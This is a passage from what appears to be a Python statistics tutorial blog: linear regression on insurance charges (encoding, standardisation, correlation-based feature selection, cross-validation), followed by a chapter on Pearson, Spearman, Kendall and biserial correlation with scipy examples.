    <AxesSubplot:>

    png

    可惜了, 没有缺失值

    2 探索数据和准备数据

    (2) 特征工程

    从原始数据中提取到的特征的好坏直接影响模型的效果, 特征工程就是从原式数据中最大限度地提取特征, 以供机器学习和算法使用

    类型提取方法
    数值类型直接使用或进行标准化处理
    时间序列转化成单独的年月日
    分类数据使用标签编码(类别只有两个, 如男=1, 女=0)或独热编码(类别超过两个)
    其他类型独热编码

    标签编码: 使用 map 函数对数据进行重新定义Pandas 中的宝藏函数-map

    1
    2
    3
    4
    5
    6
    7
    8
    # 将是否吸烟者的值映射为数值,yes 对应数值 1,no 对应数值 0
    smoker_Dict = {'yes':1,'no':0}
    data['smoker'] = data['smoker'].map(smoker_Dict)
    data.head()
    # 将性别的值映射为数值,男(male)对应数值 1,女(female)对应数值 0
    sex_Dict = {'female':0,'male':1}
    data['sex']= data['sex'].map(sex_Dict)
    data.head()
    age sex bmi children smoker region charges
    0 19 0 27.900 0 1 southwest 16884.92400
    1 18 1 33.770 1 0 southeast 1725.55230
    2 28 1 33.000 3 0 southeast 4449.46200
    3 33 1 22.705 0 0 northwest 21984.47061
    4 32 1 28.880 0 0 northwest 3866.85520
    1
    2
    3
    4
    classes = ['region']
    # 将数据转化成独热编码, 即对非数值类型的字符进行分类转换成数字。用 0-1 表示,这就将许多指标划分成若干子列
    dummies = pd.get_dummies(data[classes])
    dummies
    region_northeast region_northwest region_southeast region_southwest
    0 0 0 0 1
    1 0 0 1 0
    2 0 0 1 0
    3 0 1 0 0
    4 0 1 0 0
    ... ... ... ... ...
    1333 0 1 0 0
    1334 1 0 0 0
    1335 0 0 1 0
    1336 0 0 0 1
    1337 0 1 0 0

    1338 rows × 4 columns

    1
    2
    3
    4
    5
    6
    7
    # .join 将分类处理后的数据列添加进列表中
    # .drop 同时删除处理前的列,
    # 采用这种方式的好处:每列的名称不是无意义的
    data = data.join(dummies).drop(classes, axis = 1)
    # 新数据集
    print('汇总:', data.shape)
    data.head()
    汇总: (1338, 10)
    age sex bmi children smoker charges region_northeast region_northwest region_southeast region_southwest
    0 19 0 27.900 0 1 16884.92400 0 0 0 1
    1 18 1 33.770 1 0 1725.55230 0 0 1 0
    2 28 1 33.000 3 0 4449.46200 0 0 1 0
    3 33 1 22.705 0 0 21984.47061 0 1 0 0
    4 32 1 28.880 0 0 3866.85520 0 1 0 0

    age, bmi, children 为连续型数据, 采用标准化的特征提取

    1
    2
    3
    4
    5
    # 筛选出数据类型不是字符型的列
    num = ['age', 'bmi', 'children']
    standard_scaler = StandardScaler()
    data[num] = standard_scaler.fit_transform(data[num])
    data.head()
    age sex bmi children smoker charges region_northeast region_northwest region_southeast region_southwest
    0 -1.438764 0 -0.453320 -0.908614 1 16884.92400 0 0 0 1
    1 -1.509965 1 0.509621 -0.078767 0 1725.55230 0 0 1 0
    2 -0.797954 1 0.383307 1.580926 0 4449.46200 0 0 1 0
    3 -0.441948 1 -1.305531 -0.908614 0 21984.47061 0 1 0 0
    4 -0.513149 1 -0.292556 -0.908614 0 3866.85520 0 1 0 0
    (3) 特征相关性分析
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    cormatrix = data.corr()
    print("相关矩阵:\n",cormatrix)
    # 转化为一维表
    # 返回函数的上三角矩阵,把对角线上的置 0,让他们不是最高的。
    """
    用 corr()函数生成相关矩阵, 每个值都是数据集中各列的相关系数
    因为整个矩阵关于对角线对称, 因此只保留一半数据
    对角线为 1, 表示自己和自己, 没有分析意义, 置零
    """
    # np.tri()生成下三角矩阵,k=-1 即对角线向下偏移一个单位,对角线及以上元素全都置零
    # .T 矩阵转置,下三角矩阵转置变成上三角矩阵
    cormatrix *= np.tri(*cormatrix.values.shape, k=-1).T
    print("相关矩阵的上三角表示:\n",cormatrix)
    cormatrix = cormatrix.stack() # 利用 stack()进行数据重排,stack 以列为索引进行堆积
    print("相关矩阵:\n",cormatrix )
    # 返回某个变量和其他变量的相关性
    """
    以便观察相关性
    reindex(新索引):按新索引排序;
    abs():返回绝对值;
    sort_values():排序,ascending=False:升序,默认 true:升序;
    reset_index():将行索引转为新列的值,并命名 level_
    """
    cormatrix = cormatrix.reindex(cormatrix.sort_values(ascending=False).index).reset_index()
    cormatrix.columns = ["第一个变量", "第二个变量", "相关性"]
    cormatrix.head()
    相关矩阵:                        age       sex       bmi  children    smoker   charges  \age               1.000000 -0.020856  0.109272  0.042469 -0.025019  0.299008   sex              -0.020856  1.000000  0.046371  0.017163  0.076185  0.057292   bmi               0.109272  0.046371  1.000000  0.012759  0.003750  0.198341   children          0.042469  0.017163  0.012759  1.000000  0.007673  0.067998   smoker           -0.025019  0.076185  0.003750  0.007673  1.000000  0.787251   charges           0.299008  0.057292  0.198341  0.067998  0.787251  1.000000   region_northeast  0.002475 -0.002425 -0.138156 -0.022808  0.002811  0.006349   region_northwest -0.000407 -0.011156 -0.135996  0.024806 -0.036945 -0.039905   region_southeast -0.011642  0.017117  0.270025 -0.023066  0.068498  0.073982   region_southwest  0.010016 -0.004184 -0.006205  0.021914 -0.036945 -0.043210                     region_northeast  region_northwest  region_southeast  \age                       0.002475         -0.000407         -0.011642   sex                      -0.002425         -0.011156          0.017117   bmi                      -0.138156         -0.135996          0.270025   children                 -0.022808          0.024806         -0.023066   smoker                    0.002811         -0.036945          0.068498   charges                   0.006349         -0.039905          0.073982   region_northeast          1.000000         -0.320177         -0.345561   region_northwest         -0.320177          1.000000         -0.346265   region_southeast         -0.345561         -0.346265          1.000000   region_southwest         -0.320177         -0.320829         -0.346265                     region_southwest  age                       0.010016  sex                      -0.004184  bmi                      -0.006205  children                  0.021914  smoker                   -0.036945  charges                  -0.043210  region_northeast         -0.320177  region_northwest         -0.320829  region_southeast         -0.346265  region_southwest          1.000000  相关矩阵的上三角表示:                   age       sex       bmi  children    smoker   charges  \age               0.0 -0.020856  0.109272  0.042469 -0.025019  0.299008   sex              -0.0  0.000000  0.046371  0.017163  0.076185  0.057292   bmi               0.0  0.000000  0.000000  0.012759  0.003750  0.198341   children          0.0  0.000000  0.000000  0.000000  0.007673  0.067998   smoker           -0.0  0.000000  0.000000  0.000000  0.000000  0.787251   charges           0.0  0.000000  0.000000  0.000000  0.000000  0.000000   region_northeast  0.0 -0.000000 -0.000000 -0.000000  0.000000  0.000000   region_northwest -0.0 -0.000000 -0.000000  0.000000 -0.000000 -0.000000   region_southeast -0.0  0.000000  0.000000 -0.000000  0.000000  0.000000   region_southwest  0.0 -0.000000 -0.000000  0.000000 -0.000000 -0.000000                     region_northeast  region_northwest  region_southeast  \age                       0.002475         -0.000407         -0.011642   sex                      -0.002425         -0.011156          0.017117   bmi                      -0.138156         -0.135996          0.270025   children                 -0.022808          0.024806         -0.023066   smoker                    0.002811         -0.036945          0.068498   charges                   0.006349         -0.039905          0.073982   region_northeast          0.000000         -0.320177         -0.345561   region_northwest         -0.000000          0.000000         
-0.346265   region_southeast         -0.000000         -0.000000          0.000000   region_southwest         -0.000000         -0.000000         -0.000000                     region_southwest  age                       0.010016  sex                      -0.004184  bmi                      -0.006205  children                  0.021914  smoker                   -0.036945  charges                  -0.043210  region_northeast         -0.320177  region_northwest         -0.320829  region_southeast         -0.346265  region_southwest          0.000000  相关矩阵: age               age                 0.000000                  sex                -0.020856                  bmi                 0.109272                  children            0.042469                  smoker             -0.025019                                        ...   region_southwest  charges            -0.000000                  region_northeast   -0.000000                  region_northwest   -0.000000                  region_southeast   -0.000000                  region_southwest    0.000000Length: 100, dtype: float64
    第一个变量 第二个变量 相关性
    0 smoker charges 0.787251
    1 age charges 0.299008
    2 bmi region_southeast 0.270025
    3 bmi charges 0.198341
    4 age bmi 0.109272

    自变量与因变量 charges 的相关性按降序排列:

    1
    2
    3
    # 查看各个特征与 charges 的相关系数
    cormatrix2 = data.corr()
    cormatrix2['charges'].sort_values(ascending =False) # 特征选择
    charges             1.000000smoker              0.787251age                 0.299008bmi                 0.198341region_southeast    0.073982children            0.067998sex                 0.057292region_northeast    0.006349region_northwest   -0.039905region_southwest   -0.043210Name: charges, dtype: float64
    (4) 特征选择

    选取各个特征相关系数最大的前 6 个特征, 重新构建数据集

    1
    2
    3
    data_X = pd.concat([data['smoker'], data['age'], data['bmi'], data['region_southeast'],
    data['children'], data['sex'], data['charges']], axis=1)
    data_X.head()
    smoker age bmi region_southeast children sex charges
    0 1 -1.438764 -0.453320 0 -0.908614 0 16884.92400
    1 0 -1.509965 0.509621 1 -0.078767 1 1725.55230
    2 0 -0.797954 0.383307 1 1.580926 1 4449.46200
    3 0 -0.441948 -1.305531 0 -0.908614 1 21984.47061
    4 0 -0.513149 -0.292556 0 -0.908614 1 3866.85520

    3 建立模型

    (1) 分离自变量和因变量
    1
    2
    3
    4
    # 分离因变量
    target = data_X.charges
    # 分离自变量
    features = data_X.drop(columns=['charges'])
    (2) 检查因变量数据是否满足正态分布
    # Check whether the distribution of medical charges is normal
    x = target
    sns.distplot(x, hist=True, kde=True, kde_kws={"color": "k", "lw": 3, "label": "KDE"},
                 hist_kws={"histtype": "stepfilled", "linewidth": 3, "alpha": 1, "color": "g"})
    ### a warning is printed ###
    <AxesSubplot:xlabel='charges', ylabel='Density'>

    png

    The charges data are right-skewed (the mean exceeds the median)

    Taking the logarithm or the square root pulls the large values to the left

    # log(1 + x)
    target = np.log1p(target)
    # Check the distribution of the transformed charges
    x = target
    sns.distplot(x, hist=True, kde=True, kde_kws={"color": "k", "lw": 3, "label": "KDE"},
                 hist_kws={"histtype": "stepfilled", "linewidth": 3, "alpha": 1, "color": "g"})
    ### a warning is printed ###
    <AxesSubplot:xlabel='charges', ylabel='Density'>

    png

    (3) Split the data into training and test sets
    # Split the dataset; sklearn.model_selection.train_test_split draws a random split
    seed = 123 # random seed
    X_train, X_test, y_train, y_test = train_test_split(features, target, test_size=0.3,
                                                        random_state=seed) # 70% for training
    print("Training set", X_train.shape, ", test set", X_test.shape)
    Training set (936, 6) , test set (402, 6)
    (4) Fit a linear regression model
    # Step 1: import the linear regression class
    from sklearn.linear_model import LinearRegression
    # Step 2: create the model
    model = LinearRegression()
    # Step 3: train the model
    model.fit(X_train, y_train)
    # Retrieve the fitted parameters
    a = model.intercept_ # intercept
    b = model.coef_ # regression coefficients
    print("Best-fit line: intercept", a, "\n regression coefficients:", b)
    Best-fit line: intercept 8.851551231348216
     regression coefficients: [ 1.53318059  0.48875255  0.08953472 -0.07628352  0.1276445  -0.08411224]

    4 Evaluating the model

    # Predict with the fitted regression
    y_pred = model.predict(X_test)
    # Evaluate the regression model
    score = model.score(X_test, y_test) # coefficient of determination, method 1
    print("R-squared of the insurance regression model:", score)
    from sklearn.metrics import explained_variance_score, mean_absolute_error,\
        mean_squared_error, median_absolute_error, r2_score

    print("Mean absolute error:", mean_absolute_error(y_test, y_pred))
    print("Mean squared error (MSE):", mean_squared_error(y_test, y_pred))
    print("Median absolute error:", median_absolute_error(y_test, y_pred))
    print("Explained variance score:", explained_variance_score(y_test, y_pred))
    # coefficient of determination, method 2
    print("R-squared (via r2_score):", r2_score(y_test, y_pred))
    R-squared of the insurance regression model: 0.7830070691295015
    Mean absolute error: 0.2707571270860692
    Mean squared error (MSE): 0.17131210181347262
    Median absolute error: 0.14746506518623992
    Explained variance score: 0.7831735070420169
    R-squared (via r2_score): 0.7830070691295015
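
    Note that y_test and y_pred above live on the log1p scale of the transformed target. A minimal sketch (reusing model, X_test and y_test from the cells above) of reporting the error back in the original charge units:

    import numpy as np
    from sklearn.metrics import mean_absolute_error

    # Invert the log1p transform with expm1 to get back to dollar amounts
    charges_true = np.expm1(y_test)
    charges_pred = np.expm1(model.predict(X_test))
    print("MAE in original charge units:", mean_absolute_error(charges_true, charges_pred))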

    Refine the model with cross-validation (10-fold)

    10-fold cross-validation is a standard way to assess an algorithm's accuracy: the dataset is split into ten parts, and in turn nine parts are used for training and one part for testing.

    # Cross-validation
    from sklearn.model_selection import cross_val_predict
    predicted = cross_val_predict(model, features, target, cv=10)
    # Parameters of the linear regression model
    # (cross_val_predict fits clones, so these still come from the earlier fit)
    a = model.intercept_ # intercept
    b = model.coef_ # regression coefficients
    print("Best-fit line: intercept", a, "\n regression coefficients:", b)
    print("Mean absolute error:", mean_absolute_error(target, predicted))
    print("Mean squared error (MSE):", mean_squared_error(target, predicted))
    print("Median absolute error:", median_absolute_error(target, predicted))
    print("Explained variance score:",
          explained_variance_score(target, predicted))
    print("R-squared:", r2_score(target, predicted))
    Best-fit line: intercept 8.851551231348216
     regression coefficients: [ 1.53318059  0.48875255  0.08953472 -0.07628352  0.1276445  -0.08411224]
    Mean absolute error: 0.28154076344034734
    Mean squared error (MSE): 0.20010936615767003
    Median absolute error: 0.13490158250103956
    Explained variance score: 0.7630797649634316
    R-squared: 0.7630793987615034
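
    cross_val_predict pools the out-of-fold predictions into one vector; cross_val_score instead reports one score per fold, which shows the spread across folds. A minimal sketch under the same session:

    from sklearn.model_selection import cross_val_score

    # One R^2 score per fold of the same 10-fold split
    scores = cross_val_score(model, features, target, cv=10, scoring='r2')
    print("per-fold R^2:", scores)
    print("mean R^2: %.4f (std %.4f)" % (scores.mean(), scores.std()))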

    14.9 Expert tips

    Analytical method (normal equation)                        | Gradient descent
    Requires $(\mathbf X^T\mathbf X)$ to be invertible         | Does not require $(\mathbf X^T\mathbf X)$ to be invertible
    Inverting $(\mathbf X^T\mathbf X)$ is costly; slow with many features | Stays reasonably fast with many features
    No feature scaling needed                                  | Feature scaling needed
    Solved in a single computation                             | Needs many iterations
    No learning rate to choose                                 | Learning rate must be chosen
    May have no closed-form solution for more complex problems | Applies to more complex problems and is more portable

    In practice, as long as the number of features is below about 10,000, the analytical method is usually preferred over gradient descent
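
    A minimal sketch on synthetic data contrasting the two approaches: the normal-equation solution $w=(\mathbf X^T\mathbf X)^{-1}\mathbf X^T y$ against sklearn's LinearRegression, which reaches the same answer by least squares (all data below are illustrative):

    import numpy as np
    from sklearn.linear_model import LinearRegression

    rng = np.random.default_rng(0)
    X = rng.normal(size=(100, 3))
    y = X @ np.array([1.5, -2.0, 0.5]) + 3.0 + rng.normal(scale=0.1, size=100)

    # Normal equation with an appended column of ones for the intercept;
    # np.linalg.solve avoids forming the inverse explicitly
    Xb = np.hstack([np.ones((len(X), 1)), X])
    w = np.linalg.solve(Xb.T @ Xb, Xb.T @ y)
    print("normal equation:", w)

    model = LinearRegression().fit(X, y)
    print("sklearn:", model.intercept_, model.coef_)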

    ]]>
    @@ -9996,7 +9996,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%8013/ - 正文

    13 Correlation Analysis

    The Pearson, Spearman, and Kendall correlation coefficients, and their use in feature selection

    Covariance

    $$\mathrm{cov}(X,Y)=E\left\{\left[X-E(X)\right]\left[Y-E(Y)\right]\right\}=E(XY)-E(X)E(Y)=\sigma(X,Y)$$

    $$\mathrm{cov} (X,Y)=\rho_{XY}\sqrt{D(X)}\sqrt{D(Y)}$$

    Relationship between the two variables | positively correlated | uncorrelated (independent) | negatively correlated
    Covariance                             | > 0                   | = 0                        | < 0

    $$D(X+Y)=D(X)+D(Y)+2\mathrm{Cov}(X,Y)$$

    The covariance of X with itself is simply the variance of X

    For sample data:

    $$\mathrm{cov}(X,Y)=\frac{\sum^n_{i=1}(X_i-\bar X)(Y_i-\bar Y)}{n-1}$$

    Covariance reflects how strongly two variables vary together, but its magnitude is hard to interpret because it is not scale-free
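
    A minimal sketch (with made-up numbers) checking the sample formula against np.cov:

    import numpy as np

    x = np.array([1.0, 2.0, 3.0, 4.0, 5.0])
    y = np.array([2.0, 4.0, 5.0, 4.0, 6.0])

    # Sample covariance by the formula above (denominator n - 1)
    manual = ((x - x.mean()) * (y - y.mean())).sum() / (len(x) - 1)
    print(manual)              # 2.0
    print(np.cov(x, y)[0][1])  # np.cov agrees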

    13.2 Pearson correlation coefficient

    The Pearson correlation coefficient measures the linear relationship between two continuous, normally distributed random variables.

    It is the covariance divided by the product of the standard deviations:

    $$\rho_{XY}=\frac{\mathrm{cov}(X,Y)}{\sigma_X\sigma_Y}=\frac{\mathrm{cov}(X,Y)}{\sqrt{D(X)}\sqrt{D(Y)}}=\frac{\sigma(X,Y)}{\sigma(X)\sigma(Y)}$$

    $$-1\le \rho_{XY} \le 1$$
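
    Continuing the sketch above, dividing that covariance by the product of the standard deviations reproduces np.corrcoef:

    import numpy as np

    x = np.array([1.0, 2.0, 3.0, 4.0, 5.0])
    y = np.array([2.0, 4.0, 5.0, 4.0, 6.0])

    # rho = cov(X, Y) / (sigma_X * sigma_Y); the n-1 factors cancel in the ratio
    rho = np.cov(x, y)[0][1] / (np.std(x, ddof=1) * np.std(y, ddof=1))
    print(rho)
    print(np.corrcoef(x, y)[0][1])  # identical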

    13.3 Computing correlation coefficients and testing their significance

    13.3.1 Computing correlation coefficients

    1 Correlations between the rows, and between the columns, of a matrix
    import numpy as np

    tang = np.array([[10, 10, 8, 9, 7],
                     [4, 5, 4, 3, 3],
                     [3, 2, 1, 1, 1]])

    print("data source")
    print(tang)

    print("corrcoef between rowdata") # correlation matrix of the rows
    print(np.corrcoef(tang))

    print("corrcoef between columndata") # correlation matrix of the columns
    print(np.corrcoef(tang, rowvar=False))
    data source
    [[10 10  8  9  7]
     [ 4  5  4  3  3]
     [ 3  2  1  1  1]]
    corrcoef between rowdata
    [[1.         0.64168895 0.77174363]
     [0.64168895 1.         0.53452248]
     [0.77174363 0.53452248 1.        ]]
    corrcoef between columndata
    [[1.         0.9694552  0.9526832  0.9939441  0.97986371]
     [0.9694552  1.         0.99813671 0.99053606 0.99890611]
     [0.9526832  0.99813671 1.         0.98031562 0.99419163]
     [0.9939441  0.99053606 0.98031562 1.         0.99587059]
     [0.97986371 0.99890611 0.99419163 0.99587059 1.        ]]

    For example, entry [0][1] (equivalently [1][0]) of the row correlation matrix is 0.64168895, the correlation between row 0, [10, 10, 8, 9, 7], and row 1, [4, 5, 4, 3, 3].

    A series is perfectly correlated with itself, so the diagonal is 1.

    2 Comparing the textbook formula with the library function
    import pandas as pd
    import numpy as np

    df = pd.DataFrame([[3.8, 4, 5.8, 8, 11.3, 14.4, 16.5, 16.2, 13.8, 10.8, 6.7, 4.7],
                       [77.7, 51.2, 60.1, 54.1, 55.4, 56.8, 45, 55.3, 67.5, 73.3, 76.6, 79.6]],
                      columns=range(1, 13),
                      index=["Mean temperature t/°C", "Rainfall p/mm"])
    df.columns.name = "Month"
    df
    Month                    1     2     3     4     5     6     7     8     9    10    11    12
    Mean temperature t/°C  3.8   4.0   5.8   8.0  11.3  14.4  16.5  16.2  13.8  10.8   6.7   4.7
    Rainfall p/mm         77.7  51.2  60.1  54.1  55.4  56.8  45.0  55.3  67.5  73.3  76.6  79.6

    The correlation between London's mean temperature t and rainfall p:
    $$r_{tp}=\frac{\sigma(t,p)}{\sigma(t)\sigma(p)}=-0.4895$$

    np.corrcoef(df)
    array([[ 1.        , -0.48949468],
           [-0.48949468,  1.        ]])

    13.3.2 Significance test for the correlation coefficient

    The grade-7 maths scores X and grade-8 maths scores Y of 10 students are given below. Find the correlation between them, and judge, at the population level, whether the two sets of scores are related.

    1 Compute the correlation between the scores
    import pandas as pd
    import numpy as np

    tang = np.array([[74, 71, 72, 68, 76, 73, 67, 70, 65, 74],
                     [76, 75, 71, 70, 76, 79, 65, 77, 62, 72]])
    data = np.array([np.append(tang[0], tang[0].sum()),
                     np.append(tang[1], tang[1].sum())])
    c = list(range(1, 11))
    c.append("Total")
    df = pd.DataFrame(data, columns=c, index=["X", "Y"])
    df.columns.name = "No."
    df
    No.  1   2   3   4   5   6   7   8   9  10  Total
    X   74  71  72  68  76  73  67  70  65  74    710
    Y   76  75  71  70  76  79  65  77  62  72    723
    np.corrcoef(tang)
    array([[1.       , 0.7802972],
           [0.7802972, 1.       ]])

    The correlation coefficient is $r = 0.7802972$

    2 Test whether the populations are related

    Propose a hypothesis about the population based on the sample:

    $H_0:\rho=0,\ H_1:\rho\ne0$

    For paired data, a t test is customary; construct the test statistic.

    Testing the correlation coefficient

    escorc

    The Pearson linear correlation coefficient (r) for n pairs of independent observations can be tested against the null hypothesis (i.e., no correlation) using the statistic

    t = r*sqrt[ (n-2)/(1-r^2) ]

    This statistic has a Student-t distribution with n-2 degrees of freedom.

    $$t=\frac{r\sqrt{n-2}}{\sqrt{1-r^2}}=\frac{0.7803\sqrt{10-2}}{\sqrt{1-0.7803^2}}=3.5289$$

    $$t=3.5289>3.3554=t_{\alpha/2}(n-2)=t_{0.005}(8)$$

    At significance level $\alpha=0.01$, a two-sided $t$ test therefore rejects $\rho=0$: at the 0.01 level there is a significant correlation between the grade-7 and grade-8 maths scores

    from scipy.stats import t

    r = np.corrcoef(tang)[0][1]
    t_value = r * np.sqrt(10 - 2) / np.sqrt(1 - r ** 2)
    print("t statistic: ", t_value, '>', t.ppf(1 - 0.005, 8))
    print("p-value: ", 2 * (1 - t.cdf(t_value, 8)), '<', "0.01")
    t statistic:  3.52891333162547 > 3.3553873313333957
    p-value:  0.007744294734007395 < 0.01
    import scipy.stats as stats

    cor, pv = stats.pearsonr(tang[0], tang[1])
    print("cor =", cor)
    print("pv =", pv)
    cor = 0.7802972005173809
    pv = 0.007744294734007256

    cor is the correlation coefficient between the two series
    pv is the p-value

    Example 13.4

    import numpy as np
    import scipy.stats as stats
    import matplotlib.pyplot as plt
    # https://docs.scipy.org/doc/scipy-0.19.1/reference/stats.html#module-scipy.stats

    # data source
    x = [10.35, 6.24, 3.18, 8.46, 3.21, 7.65, 4.32, 8.66, 9.12, 10.31]
    y = [5.1, 3.15, 1.67, 4.33, 1.76, 4.11, 2.11, 4.88, 4.99, 5.12]

    # compute correlation and pvalue
    correlation, pvalue = stats.pearsonr(x, y)
    print('correlation', correlation)
    print('pvalue', pvalue)

    # create and configure the figure
    plt.figure(figsize=(8, 5), dpi=80)
    plt.subplot(111)

    # scatter plot
    plt.scatter(x, y, color='red')

    # plot the regression line (slope and intercept computed by hand)
    x = np.linspace(2, 11, 2)
    y = 0.5115 * x + 0.0649
    plt.plot(x, y, color="blue", alpha=0.2)

    plt.show()
    correlation 0.9891763198690562
    pvalue 5.926875946481136e-08

    png
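
    The hand-computed slope and intercept can also be obtained with np.polyfit; a sketch using the same x and y lists as above:

    import numpy as np

    x = [10.35, 6.24, 3.18, 8.46, 3.21, 7.65, 4.32, 8.66, 9.12, 10.31]
    y = [5.1, 3.15, 1.67, 4.33, 1.76, 4.11, 2.11, 4.88, 4.99, 5.12]

    # Degree-1 least-squares fit returns [slope, intercept]
    k, b = np.polyfit(x, y, 1)
    print(k, b)  # approximately 0.5115 and 0.0649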

    13.4 Spearman rank correlation

    13.4.1 Limitations of the Pearson coefficient

    For nonlinear relationships, the power of the Pearson test to detect association drops

    13.4.2 The Spearman rank correlation coefficient

    [Data science] Spearman's rank correlation coefficient

    1 Definition

    Spearman rank correlation is mainly used for nominal and ordinal data. When the two variables are given as, or converted to, rank orders, the underlying populations need not be normal and the sample size need not exceed 30; Spearman rank correlation can still describe the relationship between the two variables.

    $$r_s=1-\frac{6\sum d_i^2}{n^3-n}$$

    $n$ is the number of ranks and $d_i$ is the rank difference of the $i$-th pair

    • Whatever the data values or their distribution, only the ordering (rank) of each value within its variable matters

    • A perfect Spearman correlation of +1 or -1 occurs when each variable is a perfect monotone function of the other

    • Tied values receive the average of the ranks they occupy; for example, two equal values occupying ranks 5 and 6 both get rank 5.5 (see the sketch below)
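
    A minimal sketch of the tie-averaging rule with scipy's rankdata:

    from scipy.stats import rankdata

    # The two equal values would occupy ranks 5 and 6, so each receives
    # the average rank 5.5 (rankdata's default 'average' method)
    print(rankdata([10, 20, 30, 40, 50, 50, 70]))
    # [1.  2.  3.  4.  5.5 5.5 7. ]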

    3 Significance test for the Spearman coefficient

    $$t=\frac{r_s\sqrt{n-2}}{\sqrt{1-r^2_s}}$$

    4 Computing the Spearman coefficient with Python libraries
    1 Directly
    import numpy as np
    import scipy.stats as stats

    x = [10.35, 6.24, 3.18, 8.46, 3.21, 7.65, 4.32, 8.66, 9.12, 10.31]
    y = [5.1, 3.15, 1.67, 4.33, 1.76, 4.11, 2.11, 4.88, 4.99, 5.12]
    correlation, pvalue = stats.spearmanr(x, y)
    print('correlation:', correlation)
    print('pvalue:', pvalue)
    correlation: 0.9878787878787878
    pvalue: 9.307459988955517e-08
    2 Convert the raw data to ranks first, then compute the coefficient
    import numpy as np
    import scipy.stats as stats

    x = [10.35, 6.24, 3.18, 8.46, 3.21, 7.65, 4.32, 8.66, 9.12, 10.31]
    y = [5.1, 3.15, 1.67, 4.33, 1.76, 4.11, 2.11, 4.88, 4.99, 5.12]
    # rankdata() takes an array and returns an array of the same length
    # containing the rank of each element
    x = stats.rankdata(x)
    y = stats.rankdata(y)
    print(x)
    print(y)
    correlation, pvalue = stats.spearmanr(x, y)
    print('correlation:', correlation)
    print('pvalue:', pvalue)
    [10.  4.  1.  6.  2.  5.  3.  7.  8.  9.]
    [ 9.  4.  1.  6.  2.  5.  3.  7.  8. 10.]
    correlation: 0.9878787878787878
    pvalue: 9.307459988955517e-08

    The Spearman coefficient and p-value computed from the ranks match those computed from the raw data

    from scipy.stats import t
    import numpy as np
    import scipy.stats as stats

    x = [10.35, 6.24, 3.18, 8.46, 3.21, 7.65, 4.32, 8.66, 9.12, 10.31]
    y = [5.1, 3.15, 1.67, 4.33, 1.76, 4.11, 2.11, 4.88, 4.99, 5.12]
    x = stats.rankdata(x)
    y = stats.rankdata(y)

    n = len(x)
    r_s = 1 - (6 * ((x - y) ** 2).sum()) / (n ** 3 - n)
    t_value = r_s * np.sqrt(n - 2) / np.sqrt(1 - r_s ** 2)
    pvalue = 2 * (1 - t.cdf(t_value, n - 2))

    print('correlation:', r_s)
    print('pvalue:', pvalue)
    correlation: 0.9878787878787879
    pvalue: 9.307459988955517e-08

    13.5 Kendall coefficient

    Describes the agreement among K raters evaluating N objects

    13.5.3 Significance test for the Kendall coefficient

    import scipy.stats as stats

    x1 = [10, 9, 8, 7, 6]
    x2 = [10, 8, 9, 6, 7]

    tau, p_value = stats.kendalltau(x1, x2)
    print("tau", tau)
    print("p_value", p_value)
    tau 0.6
    p_value 0.23333333333333334

    The Kendall correlation between the rank data x1 and x2 is 0.6 with a p-value of about 0.233, so the agreement between them is weak (not statistically significant)

    13.6 Quality-quantity correlation

    Quality-quantity correlation analysis also studies the relationship between two variables, where

    one variable describes a qualitative property or category, e.g. male vs. female, good vs. poor, pass vs. fail (generally discrete), and

    the other variable describes a concrete property numerically, e.g. IQ, subject scores, height, weight.

    The correlation between two such variables is called quality-quantity correlation

    13.6.1 Biserial correlation

    1 Mathematical definition

    When both variables are continuous and normal, but one of them has been artificially dichotomized:

    $$R=\frac{\bar{X_p}-\bar{X_q}}{\sigma}\cdot\frac{pq}{Y}$$

    Symbol      Meaning
    $p$         proportion of one category of the dichotomous variable
    $q$         proportion of the other category
    $\bar{X_p}$ mean of the continuous variable over the $p$ category
    $\bar{X_q}$ mean of the continuous variable over the $q$ category
    $\sigma$    standard deviation of the continuous variable
    $Y$         value of the standard normal density at the quantile with cumulative probability $p$

    $$Y = \frac{1}{\sqrt{2\pi}}e^{-\frac{x^2}{2}}$$

    2 A biserial correlation example

    Example 13.10

    In an exam, the scores of 10 candidates are given below, comprising the total score and the score on one essay question. Find the discriminating power of the essay question (the correlation between its score and the total score), with an essay score $\ge 6$ counted as a pass.

    import pandas as pd
    import numpy as np
    from scipy.stats import norm

    data = np.array([[75, 57, 73, 65, 67, 56, 63, 61, 65, 67],
                     [7, 6, 7, 4, 7, 4, 4, 4, 7, 6]])
    df = pd.DataFrame(data, columns=range(1, 11), index=["Total score", "Essay score"])
    df.columns.name = "Candidate"
    df
    Candidate     1   2   3   4   5   6   7   8   9  10
    Total score  75  57  73  65  67  56  63  61  65  67
    Essay score   7   6   7   4   7   4   4   4   7   6

    With the essay question dichotomized at 6 points, the sample gives $p=0.60,\ q=0.40$

    p = np.array(np.where(data[1] >= 6)).size / len(data[1])
    q = np.array(np.where(data[1] < 6)).size / len(data[1])
    print("p:", p)
    print("q:", q)
    p: 0.6
    q: 0.4

    For $p=0.6$, the normal table gives the quantile $x=0.25$

    x = norm.ppf(p)
    print("x:", x)
    x: 0.2533471031357997

    Substituting $x=0.25$ into the standard normal density $Y = \frac{1}{\sqrt{2\pi}}e^{-\frac{x^2}{2}}$

    gives $Y=0.3866$

    Y = norm.pdf(x)
    print("Y:", Y)
    Y: 0.38634253349686054

    Grouping the total scores by the essay-question outcome, compute the group means and the sample standard deviation:

    $\bar{X_p}=67.33,\ \bar{X_q}=61.25,\ \sigma=6.12$

    X_p_bar = data[0][np.where(data[1] >= 6)].mean()
    X_q_bar = data[0][np.where(data[1] < 6)].mean()
    sigma = data[0].std(ddof=1)
    print("X_p_bar:", X_p_bar)
    print("X_q_bar:", X_q_bar)
    print("std:", sigma)
    X_p_bar: 67.33333333333333
    X_q_bar: 61.25
    std: 6.118278625016463

    Substituting into the formula gives the biserial correlation coefficient:

    $$R=\frac{\bar{X_p}-\bar{X_q}}{\sigma}\cdot\frac{pq}{Y}=\frac{67.33-61.25}{6.12}\cdot\frac{0.6\times 0.4}{0.3866}\approx 0.62$$

    R = (X_p_bar - X_q_bar) / sigma * p * q / Y
    R
    0.617662281919257

    Judging from the biserial coefficient, the essay question discriminates fairly well with respect to the total score

    13.6.2 Point-biserial correlation

    If the discrete variable describing the qualitative property is inherently discrete, rather than a continuous variable artificially dichotomized, the relationship is called point-biserial correlation.

    $$R=\frac{\bar{X_p}-\bar{X_q}}{\sigma}\cdot\sqrt{pq}$$

